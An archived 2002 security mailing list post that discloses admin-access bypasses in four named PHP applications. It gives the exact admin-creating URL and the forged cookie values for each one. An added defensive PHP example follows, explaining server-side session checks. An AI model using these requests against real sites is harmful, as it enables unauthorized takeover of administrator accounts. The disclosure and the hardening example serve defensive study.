Vulnerability Development mailing list archives
Multiples holes in PHP services.
From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 11 Feb 2002 16:08:49 +0100
The URL http://www.host.com/index.php?loggedin=true&action=auser&new_un=test&new_pw=test&new_pw1=test&new_level=1&submit=Save allows creating an admin access (nick: test, password: test) on a nWebSystems Voting System site.
More details in French: http://balteam.multimania.com/Tuts/nwebsystemsvs.txt
FORUMPERSO v2.1: Anyone can be admin if he sends the cookies "pass_ok[0]","1" and "pass_ok[1]","admin" to the page http://www.host.com/connect.php3?id_forum=&addr=install.php3.
PHPMyAnnu v2.02: Anyone can be admin if he sends the cookie "phpmyannu_admin_ok","yes" to the page http://www.host.com/path/admin/admin.php3.
phpMyNewsletter v0.6.6: Anyone can be admin if he sends the cookie "adminnews","true" to the page http://www.host.com/admin.php3.
More details in French: http://balteam.multimania.com/Tuts/4cookieholes.txt
frog-m@n
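The cookie issues reported above share one pattern: the admin page accepts a value sent by the browser as proof of authentication. The following is an added example, not code from the original post or from any of the named applications; the function names, the `is_admin` session key and the sample password are hypothetical, and plain arrays stand in for `$_COOKIE` and `$_SESSION` so it runs from the command line.

```php
<?php
// Added illustration; not taken from FORUMPERSO, PHPMyAnnu or phpMyNewsletter.
// Function names and the 'is_admin' session key are hypothetical.

// Weak pattern: the cookie is fully client-controlled, so this check
// proves nothing about who is making the request.
function is_admin_weak(array $cookies): bool
{
    return ($cookies['adminnews'] ?? '') === 'true';
}

// Hardened pattern: the flag lives in server-side session storage and is
// set only after the password has been verified on the server.
function login(array &$session, string $password, string $storedHash): bool
{
    if (!password_verify($password, $storedHash)) {
        return false;
    }
    // In a real application, call session_regenerate_id(true) here as well.
    $session['is_admin'] = true; // the browser only ever holds the session id
    return true;
}

function is_admin_hardened(array $session): bool
{
    return ($session['is_admin'] ?? false) === true;
}

// Constructed sample data.
$storedHash    = password_hash('correct horse', PASSWORD_DEFAULT);
$forgedCookies = ['adminnews' => 'true']; // a value any client can send
$session       = [];                      // stands in for $_SESSION

// Forged cookie against the weak check, then against the session check.
var_dump(is_admin_weak($forgedCookies));
var_dump(is_admin_hardened($session));

// A wrong password leaves the session unprivileged.
var_dump(login($session, 'wrong guess', $storedHash));
var_dump(is_admin_hardened($session));

// Only a verified login sets the server-side flag.
var_dump(login($session, 'correct horse', $storedHash));
var_dump(is_admin_hardened($session));
```

The same reasoning applies to the `loggedin=true` query parameter in the first report: any authorization state read from request input, rather than from server-side storage, can be set by the client.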